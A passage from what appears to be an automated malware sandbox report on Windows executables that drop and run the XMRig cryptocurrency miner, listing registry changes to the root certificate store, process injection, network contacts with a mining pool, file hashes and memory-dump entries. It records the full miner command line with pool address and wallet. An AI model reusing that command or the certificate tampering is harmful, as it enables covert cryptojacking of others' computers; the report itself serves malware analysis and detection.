034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2468 wrote to memory of 3040 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2468 wrote to memory of 3040 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3040-16-0x000002711F5A0000-0x000002711F5C0000-memory.dmp
memory/3040-17-0x000002711F5F0000-0x000002711F610000-memory.dmp
memory/3040-18-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-20-0x000002711F630000-0x000002711F650000-memory.dmp
memory/3040-19-0x000002711F610000-0x000002711F630000-memory.dmp
memory/3040-21-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-22-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-25-0x000002711F630000-0x000002711F650000-memory.dmp
memory/3040-24-0x000002711F610000-0x000002711F630000-memory.dmp
memory/3040-23-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-26-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-27-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-28-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-29-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-30-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-31-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-32-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-33-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-34-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-35-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-36-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-37-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-38-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-39-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-40-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-41-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-42-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-43-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-44-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-45-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-46-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-47-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-48-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-49-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-50-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-51-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-52-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-53-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-54-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-55-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-56-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-57-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-58-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-59-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-60-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-61-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-62-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-63-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-64-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-65-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-66-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-67-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-68-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-69-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-70-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-71-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-72-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-73-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-74-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-75-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-76-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-77-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-78-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-79-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-80-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-81-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-82-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-83-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
memory/3040-84-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-05-22 15:12
Reported
2024-05-22 16:24
Platform
win10v2004-20240508-en
Max time kernel
1793s
Max time network
1795s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1316 wrote to memory of 4524 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1316 wrote to memory of 4524 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.53.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| NL | 23.62.61.160:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 160.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4524-16-0x000001F50DAD0000-0x000001F50DAF0000-memory.dmp
memory/4524-17-0x000001F50DD20000-0x000001F50DD40000-memory.dmp
memory/4524-18-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp
memory/4524-20-0x000001F50F520000-0x000001F50F540000-memory.dmp
memory/4524-19-0x000001F50F500000-0x000001F50F520000-memory.dmp
memory/4524-21-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp
memory/4524-22-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp
memory/4524-23-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp
memory/4524-25-0x000001F50F520000-0x000001F50F540000-memory.dmp
memory/4524-24-0x000001F50F500000-0x000001F50F520000-memory.dmp
memory/4524-26-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp
memory/4524-27-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp
memory/4524-28-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp
memory/4524-29-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp
memory/4524-30-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp
memory/4524-31-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp
memory/4524-32-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp
memory/4524-33-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp
memory/4524-34-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp
memory/4524-35-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp
memory/4524-36-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp
memory/4524-37-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp
memory/4524-38-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp
memory/4524-39-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp
memory/4524-40-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp
memory/4524-41-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp
memory/4524-42-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp
memory/4524-43-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp
memory/4524-44-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp
memory/4524-45-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp
memory/4524-46-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp
memory/4524-47-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp
memory/4524-48-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp
memory/4524-49-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp
memory/4524-50-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp
memory/4524-51-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp
memory/4524-52-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp
